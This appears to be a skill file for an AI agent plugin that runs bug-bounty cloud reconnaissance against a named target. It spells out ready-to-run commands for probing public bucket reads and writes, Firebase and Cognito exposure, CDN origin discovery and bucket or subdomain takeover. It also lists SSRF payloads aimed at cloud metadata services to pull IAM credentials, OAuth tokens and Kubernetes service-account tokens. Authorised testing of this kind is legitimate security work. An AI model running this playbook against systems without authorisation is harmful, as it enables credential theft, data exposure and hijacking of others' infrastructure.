Cloud infrastructure misconfiguration hunting - S3/GCS/Azure bucket takeover, cloud metadata SSRF, IAM policy analysis, serverless exposure, and CDN origin discovery
From greyhatcc. Install: npx claudepluginhub overtimepog/greyhatcc --plugin greyhatcc. This skill uses the workspace's default tool permissions.
/greyhatcc:cloud <domain or program_name>
{{ARGUMENTS}} is parsed automatically — just provide a target in any format:
No format specification needed from user — detect and proceed.
Before executing, follow the context-loader protocol:
Pull cloud references from existing recon data:
Sources to mine:
- JS bundles (js-analysis skill output) → S3 URLs, Firebase refs, Cognito pools
- CSP headers → S3 bucket names, CloudFront distributions, GCS buckets
- DNS records → CNAME to cloud services, ELB hostnames
- Subdomains → *.s3.amazonaws.com, *.blob.core.windows.net patterns
- HTTP responses → X-Amz-*, X-GCloud-*, Azure headers
- Error pages → Cloud provider error signatures
- Source maps → Infrastructure URLs in original source
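The mining above can be sketched as a few greps over prior recon output; the directory path and regexes below are assumptions to adapt to the workspace layout:

```shell
# Sketch: mine prior recon output for cloud resource references.
# The recon/ path is an assumption -- point it at your own workspace layout.
scan_cloud_refs() {
  dir="$1"
  grep -rhoE '[a-z0-9.-]+\.s3\.amazonaws\.com' "$dir" 2>/dev/null | sort -u
  grep -rhoE '[a-z0-9-]+\.blob\.core\.windows\.net' "$dir" 2>/dev/null | sort -u
  grep -rhoE 'storage\.googleapis\.com/[a-z0-9._-]+' "$dir" 2>/dev/null | sort -u
  grep -rhoE '[a-z0-9-]+\.(firebaseio\.com|cloudfront\.net)' "$dir" 2>/dev/null | sort -u
}
scan_cloud_refs "bug_bounty/example_bug_bounty/recon"
```

Each unique hit feeds the bucket and Firebase checks below.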
# Check bucket names derived from: domain, org name, common patterns
# Pattern: <domain>, <domain>-assets, <domain>-backup, <domain>-dev, <domain>-staging,
# <domain>-uploads, <domain>-media, <domain>-static, <domain>-logs,
# <org>-<service>, <org>-production, <org>-internal
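The patterns above can be expanded mechanically; gen_bucket_names and its suffix list are illustrative, not exhaustive:

```shell
# Sketch: expand a domain and org into candidate bucket names.
# The suffix list mirrors the patterns above -- extend with program-specific terms.
gen_bucket_names() {
  base="${1%%.*}"   # "example.com" -> "example"
  org="$2"
  for suffix in "" -assets -backup -dev -staging -uploads -media -static -logs; do
    echo "${base}${suffix}"
  done
  for svc in production internal; do
    echo "${org}-${svc}"
  done
}
gen_bucket_names "example.com" "example" | sort -u
```

Pipe the output into the existence check below, one name at a time.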
# Check bucket existence and permissions
aws s3 ls s3://<bucket-name> --no-sign-request 2>&1
# Listing returned = public read (HIGH finding)
# AccessDenied = exists but private (note for later)
# NoSuchBucket = doesn't exist (potential takeover if referenced)
# Check for public write
echo "test" | aws s3 cp - s3://<bucket-name>/pentest_write_test.txt --no-sign-request 2>&1
# If succeeds = CRITICAL finding (public write)
# IMMEDIATELY delete: aws s3 rm s3://<bucket-name>/pentest_write_test.txt --no-sign-request
# Check blob containers
curl -sk "https://<storage-account>.blob.core.windows.net/<container>?restype=container&comp=list"
# 200 with XML = public listing
# Check GCS buckets
curl -sk "https://storage.googleapis.com/<bucket-name>"
# 200 = public listing
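A single candidate name can be probed across all three providers in one pass; check_bucket is a sketch that prints only status codes against the documented public listing endpoints:

```shell
# Sketch: probe one candidate name across S3, GCS, and Azure Blob in one pass.
# Only status codes are printed; interpret them per the notes above.
check_bucket() {
  name="$1"
  for url in \
    "https://${name}.s3.amazonaws.com/" \
    "https://storage.googleapis.com/${name}" \
    "https://${name}.blob.core.windows.net/?comp=list"; do
    code=$(curl -skm 5 -o /dev/null -w '%{http_code}' "$url")
    echo "$code $url"
  done
}
check_bucket "example-assets"
```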
# Check Firebase Realtime Database
curl -sk "https://<project-id>.firebaseio.com/.json"
# 200 with data = public read (HIGH/CRITICAL)
# Check Firestore
curl -sk "https://firestore.googleapis.com/v1/projects/<project-id>/databases/(default)/documents"
# Check Firebase Storage
curl -sk "https://firebasestorage.googleapis.com/v0/b/<project-id>.appspot.com/o"
# 200 with items = public listing
# Check Firebase Storage write (upload a test file)
curl -sk -X POST \
"https://firebasestorage.googleapis.com/v0/b/<project-id>.appspot.com/o?name=pentest_write_test.txt" \
-H "Content-Type: text/plain" \
-d "pentest write test - overtimedev"
# 200 = CRITICAL: public write to Firebase Storage
# If pool ID is known (from JS analysis):
aws cognito-idp describe-user-pool-client \
--user-pool-id <pool-id> \
--client-id <client-id> \
--region <region> 2>&1
# Check self-signup
aws cognito-idp sign-up \
--client-id <client-id> \
--username test@test.com \
--password TestPass123! \
--region <region> 2>&1
# If sign-up succeeds without CAPTCHA/verification = open self-signup (finding)
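If JS analysis also surfaces a Cognito identity pool id (distinct from the user pool), check whether unauthenticated identities are enabled, since that yields temporary AWS credentials; the pool id and region below are placeholders:

```shell
# Sketch: test a Cognito *identity* pool for unauthenticated access.
# POOL_ID is a placeholder -- take the real one from JS analysis output.
POOL_ID="us-east-1:00000000-0000-0000-0000-000000000000"
ID=$(aws cognito-identity get-id --identity-pool-id "$POOL_ID" \
     --region us-east-1 --query IdentityId --output text 2>&1)
echo "$ID"
# If an IdentityId comes back, fetch credentials and enumerate what they reach:
# aws cognito-identity get-credentials-for-identity --identity-id "$ID" --region us-east-1
```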
# Shodan SSL cert search for origin IPs behind CDN
# Use MCP: shodan_ssl_cert with target domain
# Historical DNS for pre-CDN IPs
# Use MCP: dns_records + WebSearch for SecurityTrails/ViewDNS
# SPF record leakage (mail servers often on origin)
dig +short TXT <domain> | grep spf
# Check if apex vs www have different CDN behavior
dig +short <domain>
dig +short www.<domain>
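Once a candidate origin IP surfaces, a quick sketch to confirm it actually serves the target (the domain and IP below are placeholders; 203.0.113.10 is TEST-NET-3):

```shell
# Sketch: compare a response via the CDN vs. direct-to-IP with SNI/Host intact.
# DOMAIN and CANDIDATE_IP are placeholders.
DOMAIN="example.com"
CANDIDATE_IP="203.0.113.10"
curl -skm 5 -o /dev/null -w 'cdn:    %{http_code} %{size_download}\n' "https://${DOMAIN}/"
curl -skm 5 -o /dev/null -w 'origin: %{http_code} %{size_download}\n' \
  --resolve "${DOMAIN}:443:${CANDIDATE_IP}" "https://${DOMAIN}/"
# Matching status and a similar body size suggest the IP is the real origin.
```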
Cloud metadata endpoints to target:
AWS IMDSv1 (no headers needed):
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
AWS IMDSv2 (needs PUT for token first):
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
GCP:
http://metadata.google.internal/computeMetadata/v1/ (needs Metadata-Flavor: Google header)
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token (same header required)
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01 (needs Metadata: true header)
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
DigitalOcean:
http://169.254.169.254/metadata/v1/
Kubernetes:
https://kubernetes.default.svc/api/v1/
/var/run/secrets/kubernetes.io/serviceaccount/token
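Assuming an SSRF-able parameter was found elsewhere in the app, the endpoints above can be looped through it; the target and its ?url= parameter are hypothetical, and python3 is used only for URL-encoding:

```shell
# Sketch: replay metadata URLs through a hypothetical SSRF-able parameter.
# TARGET and ?url= are assumptions -- substitute the real vulnerable endpoint.
TARGET="https://example.com/fetch?url="
for payload in \
  "http://169.254.169.254/latest/meta-data/" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01" \
  "http://metadata.google.internal/computeMetadata/v1/" \
  "http://169.254.169.254/metadata/v1/"; do
  enc=$(python3 -c 'import sys,urllib.parse; print(urllib.parse.quote(sys.argv[1], safe=""))' "$payload")
  code=$(curl -skm 3 -o /dev/null -w '%{http_code}' "${TARGET}${enc}")
  echo "$code $payload"
done
# Responses that differ in status/length from an innocuous URL hint at SSRF reach.
```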
Check for internal hostnames in public DNS (found in recon):
- *.internal.<domain> → often resolves to RFC1918 IPs
- autoqueue.internal.*, worker.internal.*, etc.
- These are SSRF pivot targets if any SSRF exists
A bucket is takeover-able when:
1. The target references it (in CSP, JS, DNS CNAME, etc.)
2. The bucket doesn't exist (NoSuchBucket) or was deleted
3. An attacker can create a bucket with the same name
Check: Is the bucket referenced in a security-sensitive context?
- CSP script-src → attacker serves malicious JS = XSS on the target (CRITICAL)
- Asset loading (images, CSS) → content injection (MEDIUM)
- CNAME to S3 → subdomain takeover (HIGH)
- Backup/data bucket → data exposure or supply chain (HIGH-CRITICAL)
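A minimal sketch for triaging one referenced bucket against the criteria above (the bucket name is a placeholder taken from a CSP/JS reference):

```shell
# Sketch: classify one referenced bucket. BUCKET is a placeholder pulled
# from a CSP header or JS reference in recon output.
BUCKET="example-assets"
out=$(aws s3 ls "s3://${BUCKET}" --no-sign-request 2>&1)
case "$out" in
  *NoSuchBucket*) echo "DANGLING: ${BUCKET} referenced but unclaimed" ;;
  *AccessDenied*) echo "claimed but private: ${BUCKET}" ;;
  *)              echo "claimed (listable or other): ${BUCKET}" ;;
esac
```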
Check for:
- CNAME → *.s3.amazonaws.com that returns NoSuchBucket
- CNAME → *.herokuapp.com that returns "no such app"
- CNAME → *.azurewebsites.net that returns "not found"
- CNAME → *.cloudfront.net with no distribution
- CNAME → *.elasticbeanstalk.com that's unclaimed
- NS records pointing to decommissioned DNS providers
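These checks can be scripted as a fingerprint loop; the error-body signatures below are illustrative and drift over time, so verify candidates manually before reporting:

```shell
# Sketch: fingerprint one CNAME'd host for takeover signatures.
# Signatures are illustrative; providers change their error pages.
check_dangling() {
  host="$1"
  cname=$(dig +short CNAME "$host" 2>/dev/null)
  body=$(curl -skm 5 "https://${host}/")
  case "$body" in
    *NoSuchBucket*|*"no such app"*|*"404 Web Site not found"*)
      echo "TAKEOVER CANDIDATE: ${host} -> ${cname}" ;;
    *) echo "ok: ${host} -> ${cname}" ;;
  esac
}
check_dangling "assets.example.com"
```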
bug_bounty/<program>_bug_bounty/recon/cloud/
├── buckets.md → All discovered buckets with access status
├── firebase.md → Firebase project findings
├── cognito.md → Cognito pool enumeration results
├── cdn_origins.md → Origin IPs discovered behind CDN
├── cloud_metadata.md → SSRF/metadata test results
├── takeover_candidates.md → Dangling cloud resources for takeover
└── cloud_summary.md → Executive summary with findings
Related command: /greyhatcc:findings
Agents that run this skill: recon-specialist-high (opus) with this skill, recon-specialist-low (haiku), recon-specialist (sonnet), exploit-developer (opus)
When delegating to agents via Task(), ALWAYS:
After completing this skill:
- tested.json — record what was tested (asset + vuln class)
- gadgets.json — add any informational findings with provides/requires tags for chaining
- findings_log.md — log any confirmed findings with severity